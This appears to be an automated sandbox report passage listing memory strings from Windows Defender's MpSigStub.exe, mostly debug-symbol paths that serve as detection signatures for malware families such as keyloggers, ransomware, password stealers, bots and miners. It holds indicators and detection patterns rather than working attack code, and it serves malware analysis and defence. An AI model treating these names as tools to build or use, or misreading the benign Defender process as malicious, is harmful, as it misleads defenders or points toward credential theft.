Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2644:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2644:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
